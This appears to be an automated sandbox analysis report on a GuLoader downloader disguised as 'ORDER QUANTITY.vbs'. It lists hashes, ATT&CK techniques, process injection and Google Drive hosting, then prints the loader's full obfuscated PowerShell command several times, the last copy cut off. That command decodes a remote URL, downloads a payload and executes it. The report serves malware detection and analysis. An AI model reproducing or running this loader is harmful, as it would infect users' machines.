guloader | c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c

General

Target

ORDER QUANTITY.vbs
Size

20KB
MD5

b4b8045f84ab0b8229af71524f891fb4
SHA1

f43aad4d678ba2e259b5a357aecb19d3329e03e3
SHA256

c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c
SHA512

0424d77750ca1a1d78932162a5e4c223c805bdc3c82c960c24b2512d439992953b1aec2b872c09e18901a81a3fd02d5b08575d0edccf0ec0d5b5ef887aa6421d
SSDEEP

384:ADlQ3GOmBsxCnQ8tcIgn9csOkKENYbXfzuzLfEO7FLpoMMqQW59Bh:B39cs8QqYesWEuXfnudoMDb

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1476	WScript.exe
8	4964	powershell.exe
17	4964	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com
39	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2868	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4860	powershell.exe
2868	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4860 set thread context of 2868	4860	powershell.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4964	powershell.exe
1416	cmd.exe
4860	powershell.exe

System Time Discovery 1 TTPs 3 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
4964	powershell.exe
1416	cmd.exe
4860	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4964	powershell.exe
4964	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4860	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1476 wrote to memory of 4964	1476	WScript.exe	82
PID 1476 wrote to memory of 4964	1476	WScript.exe	82
PID 4964 wrote to memory of 868	4964	powershell.exe	84
PID 4964 wrote to memory of 868	4964	powershell.exe	84
PID 4964 wrote to memory of 1416	4964	powershell.exe	92
PID 4964 wrote to memory of 1416	4964	powershell.exe	92
PID 1416 wrote to memory of 4860	1416	cmd.exe	93
PID 1416 wrote to memory of 4860	1416	cmd.exe	93
PID 1416 wrote to memory of 4860	1416	cmd.exe	93
PID 4860 wrote to memory of 1356	4860	powershell.exe	94
PID 4860 wrote to memory of 1356	4860	powershell.exe	94
PID 4860 wrote to memory of 1356	4860	powershell.exe	94
PID 4860 wrote to memory of 2868	4860	powershell.exe	95
PID 4860 wrote to memory of 2868	4860	powershell.exe	95
PID 4860 wrote to memory of 2868	4860	powershell.exe	95
PID 4860 wrote to memory of 2868	4860	powershell.exe	95
PID 4860 wrote to memory of 2868	4860	powershell.exe	95

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDER QUANTITY.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
  2⤵
  - Blocklisted process makes network request
  - System Network Configuration Discovery: Internet Connection Discovery
  - System Time Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
    3⤵
    PID:868
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - System Time Discovery
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy 